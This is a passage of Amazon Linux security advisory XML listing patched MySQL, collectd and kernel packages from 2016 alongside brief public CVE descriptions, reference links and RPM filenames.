CVE-2016-0666 mysql: unspecified vulnerability in subcomponent: Server: Security: Privileges (CPU April 2016)
CVE-2016-0651:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier allows local users to affect availability via vectors related to Optimizer.
1329254:
CVE-2016-0651 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU April 2016)
CVE-2016-0650:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to Replication.
1329253:
CVE-2016-0650 mysql: unspecified vulnerability in subcomponent: Server: Replication (CPU April 2016)
CVE-2016-0649:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to PS.
1329252:
CVE-2016-0649 mysql: unspecified vulnerability in subcomponent: Server: PS (CPU April 2016)
CVE-2016-0648:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect availability via vectors related to PS.
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to PS.
1329251:
CVE-2016-0648 mysql: unspecified vulnerability in subcomponent: Server: PS (CPU April 2016)
CVE-2016-0647:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect availability via vectors related to FTS.
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to FTS.
1329249:
CVE-2016-0647 mysql: unspecified vulnerability in subcomponent: Server: FTS (CPU April 2016)
CVE-2016-0646:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to DML.
1329248:
CVE-2016-0646 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU April 2016)
CVE-2016-0644:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect availability via vectors related to DDL.
1329247:
CVE-2016-0644 mysql: unspecified vulnerability in subcomponent: Server: DDL (CPU April 2016)
CVE-2016-0643:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect confidentiality via vectors related to DML.
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect confidentiality via vectors related to DML.
1329245:
CVE-2016-0643 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU April 2016)
CVE-2016-0642:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect integrity and availability via vectors related to Federated.
1329243:
CVE-2016-0642 mysql: unspecified vulnerability in subcomponent: Server: Federated (CPU April 2016)
CVE-2016-0641:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect confidentiality and availability via vectors related to MyISAM.
1329241:
CVE-2016-0641 mysql: unspecified vulnerability in subcomponent: Server: MyISAM (CPU April 2016)
CVE-2016-0640:
Unspecified vulnerability in Oracle MySQL 5.5.47 and earlier, 5.6.28 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.48, 10.0.x before 10.0.24, and 10.1.x before 10.1.12 allows local users to affect integrity and availability via vectors related to DML.
1329239:
CVE-2016-0640 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU April 2016)
CVE-2016-0616:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301510:
CVE-2016-0616 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0609:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to privileges.
1301507:
CVE-2016-0609 mysql: unspecified vulnerability in subcomponent: Server: Security: Privileges (CPU January 2016)
CVE-2016-0608:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to UDF.
1301506:
CVE-2016-0608 mysql: unspecified vulnerability in subcomponent: Server: UDF (CPU January 2016)
CVE-2016-0606:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect integrity via unknown vectors related to encryption.
1301504:
CVE-2016-0606 mysql: unspecified vulnerability in subcomponent: Server: Security: Encryption (CPU January 2016)
CVE-2016-0600:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
1301501:
CVE-2016-0600 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU January 2016)
CVE-2016-0598:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.
1301498:
CVE-2016-0598 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0597:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
1301497:
CVE-2016-0597 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU January 2016)
CVE-2016-0596:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and 5.6.27 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via vectors related to DML.
1301496:
CVE-2016-0596 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU January 2016)
CVE-2016-0546:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client. NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that these are multiple buffer overflows in the mysqlshow tool that allow remote database servers to have unspecified impact via a long table or database name.
1301493:
CVE-2016-0546 mysql: unspecified vulnerability in subcomponent: Client (CPU January 2016)
CVE-2016-0505:
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Options.
1301492:
CVE-2016-0505 mysql: unspecified vulnerability in subcomponent: Server: Options (CPU January 2016)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0505" title="" id="CVE-2016-0505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0546" title="" id="CVE-2016-0546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0596" title="" id="CVE-2016-0596" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0597" title="" id="CVE-2016-0597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0598" title="" id="CVE-2016-0598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0600" title="" id="CVE-2016-0600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0606" title="" id="CVE-2016-0606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0608" title="" id="CVE-2016-0608" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0609" title="" id="CVE-2016-0609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0616" title="" id="CVE-2016-0616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0640" title="" id="CVE-2016-0640" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0641" title="" id="CVE-2016-0641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0642" title="" id="CVE-2016-0642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0643" title="" id="CVE-2016-0643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0644" title="" id="CVE-2016-0644" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0646" title="" id="CVE-2016-0646" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0647" title="" id="CVE-2016-0647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0648" title="" id="CVE-2016-0648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0649" title="" id="CVE-2016-0649" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0650" title="" id="CVE-2016-0650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0651" title="" id="CVE-2016-0651" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0666" title="" id="CVE-2016-0666" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2047" title="" id="CVE-2016-2047" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3452" title="" id="CVE-2016-3452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3477" title="" id="CVE-2016-3477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3521" title="" id="CVE-2016-3521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3615" title="" id="CVE-2016-3615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5440" title="" id="CVE-2016-5440" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5444" title="" id="CVE-2016-5444" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql-config" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package 
name="mysql55-debuginfo" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.51" release="1.11.amzn1" 
epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.51-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-739</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-739: medium priority package update for collectd</title><issued date="2016-09-01 18:00:00" /><updated date="2016-09-01 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6254:
Heap-based buffer overflow in the parse_packet function in network.c in collectd before 5.4.3 and 5.x before 5.5.2 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a crafted network packet.
1360709:
CVE-2016-6254 collectd: heap overflow in the network plugin
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6254" title="" id="CVE-2016-6254" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="collectd-web" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-web-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-postgresql" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-postgresql-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-gmond" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-gmond-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-mysql" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-mysql-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-snmp" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-snmp-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdcached" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdcached-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-varnish" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-varnish-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-notify_email" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-notify_email-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-apache" version="5.4.1" release="1.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/collectd-apache-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-generic-jmx" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-generic-jmx-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-lvm" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lvm-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdtool" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdtool-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-memcachec" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-memcachec-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-netlink" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-netlink-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-java" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-java-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-ipvs" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipvs-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-ipmi" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipmi-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-bind" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-bind-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-debuginfo" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-debuginfo-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-email" version="5.4.1" release="1.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/collectd-email-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-dbi" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dbi-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-curl_xml" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl_xml-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-nginx" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-nginx-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-curl" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-dns" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dns-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="perl-Collectd" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Collectd-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-iptables" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-iptables-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-amqp" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-amqp-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-gmond" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-gmond-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-java" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-java-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-lvm" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lvm-5.4.1-1.11.amzn1.i686.rpm</filename></package><package 
name="collectd-bind" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-bind-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-ipvs" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipvs-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-rrdcached" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdcached-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-generic-jmx" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-generic-jmx-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-amqp" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-amqp-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-memcachec" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-memcachec-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-postgresql" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-postgresql-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-web" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-web-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-dbi" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dbi-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-email" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-email-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-mysql" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-mysql-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-rrdtool" version="5.4.1" release="1.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/collectd-rrdtool-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-curl_xml" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl_xml-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-nginx" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-nginx-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-snmp" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-snmp-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="perl-Collectd" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Collectd-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-curl" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-notify_email" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-notify_email-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-debuginfo" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-debuginfo-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-ipmi" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipmi-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-iptables" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-iptables-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-dns" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dns-5.4.1-1.11.amzn1.i686.rpm</filename></package><package 
name="collectd-varnish" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-varnish-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-apache" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-apache-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-netlink" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-netlink-5.4.1-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-740</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-740: medium priority package update for kernel</title><issued date="2016-09-01 18:00:00" /><updated date="2016-09-01 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6828:
1367091:
CVE-2016-6828 kernel: Use after free in tcp_xmit_retransmit_queue
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6828" title="" id="CVE-2016-6828" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.19" release="29.55.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" 